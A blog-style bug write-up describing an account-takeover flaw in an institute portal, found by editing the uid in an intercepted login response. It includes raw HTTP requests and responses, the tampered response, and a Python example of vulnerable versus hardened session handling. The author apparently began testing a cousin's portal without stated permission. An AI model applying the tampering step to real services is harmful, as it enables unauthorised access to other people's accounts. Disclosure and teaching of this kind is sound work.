
How I found IDOR at a University Portal in 10 minutes!

Kapil Varma


While I was messing around with my cousin’s institute portal, I noticed its login area and got curious to test how it worked.

I got his credentials for the portal and intercepted the login request in Burp Suite. The request looked like this:

POST /login/process HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
router-path: /
Content-Type: application/json;charset=utf-8
Content-Length: 74
Origin: https://target.com
Connection: close
Referer: https://target.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site

{"uid":"attacker@outlook.com","pass":"Pass@123","dns":"target.com"}

I then captured the server’s response to the request shown above. This is the response I got:

HTTP/1.1 200
Date: Thu, 19 Jan 2023 12:42:35 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Server: nginx/1.18.0
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
Content-Length: 310

{"policy_read":true,"msg":"200","uid":"attacker@outlook.com","awspath":"https://(xxxx).amazonaws.com/","token":"somevalue3212"}

I noticed that the response included the email along with a token.

Still, who knew whether that token was actually doing anything?!!

So on my phone, I created another account on the same portal using a different email, “victim@outlook.com”.

After registering it, I modified the response shown above by replacing the attacker’s email with the email of the new victim account, so the edited response looked like this:

HTTP/1.1 200
Date: Thu, 19 Jan 2023 12:42:35 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Server: nginx/1.18.0
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
Content-Length: 310

{"policy_read":true,"msg":"200","uid":"victim@outlook.com","awspath":"https://(xxxx).amazonaws.com/","token":"somevalue3212"}

I forwarded the manipulated response and guess what?!

I got logged in to the victim account!!

I realised that the token was of NO USE: the portal logged me into whichever account the uid in the response named!!
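To make the root cause concrete, here is an added example (my own code, not the portal’s) that contrasts the broken pattern with the fix. The account store, passwords and handler names are constructed for illustration: the vulnerable handler serves whatever uid the client echoes back as long as some valid token is present, while the hardened handler derives identity from the token’s server-side binding and rejects a mismatching uid.

```python
import hmac
import secrets

# Constructed sample accounts (not from the original post).
ACCOUNTS = {
    "attacker@outlook.com": {"name": "Attacker", "password": "sample-pw-1"},
    "victim@outlook.com": {"name": "Victim", "password": "sample-pw-2"},
}

# Server-side session store: opaque token -> the uid it was issued for.
SESSIONS: dict[str, str] = {}


def login(uid: str, password: str) -> dict:
    """Authenticate and issue an opaque token bound, server-side, to this uid."""
    account = ACCOUNTS.get(uid)
    if account is None or not hmac.compare_digest(account["password"], password):
        return {"msg": "401"}
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = uid
    return {"policy_read": True, "msg": "200", "uid": uid, "token": token}


def profile_vulnerable(uid: str, token: str) -> dict:
    """Broken pattern: the uid the client sends decides whose data is served.
    The token is only checked for existence, never for which account owns it,
    so swapping the uid in the login response is enough to become someone else."""
    if token not in SESSIONS:
        return {"msg": "401"}
    return {"uid": uid, "name": ACCOUNTS[uid]["name"]}


def profile_hardened(uid: str, token: str) -> dict:
    """Fixed pattern: identity comes from the token's server-side binding.
    A client-supplied uid that disagrees with it is refused; that mismatch is
    also a useful signal to log, since a normal client never produces it."""
    owner = SESSIONS.get(token)
    if owner is None:
        return {"msg": "401"}
    if uid != owner:
        return {"msg": "403", "detail": "uid does not match session owner"}
    return {"uid": owner, "name": ACCOUNTS[owner]["name"]}


def replay_writeup() -> tuple[dict, dict]:
    """Reproduce the post's scenario: log in as attacker, then present the
    attacker's token together with the victim's uid to both handlers."""
    resp = login("attacker@outlook.com", "sample-pw-1")
    tampered_uid = "victim@outlook.com"
    return profile_vulnerable(tampered_uid, resp["token"]), profile_hardened(tampered_uid, resp["token"])
```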

I created a POC of the bug and reported it to the Institute.

The token made it seem like this wouldn’t be possible, but there was still some uncertainty, so we took the chance and it worked out ;)

Happy Hacking !!

#bugbounty #ethicalhacking #cybersecurity #vulnerability


Kapil Varma

A Cybersecurity Enthusiast, Ethical Hacker and Security Researcher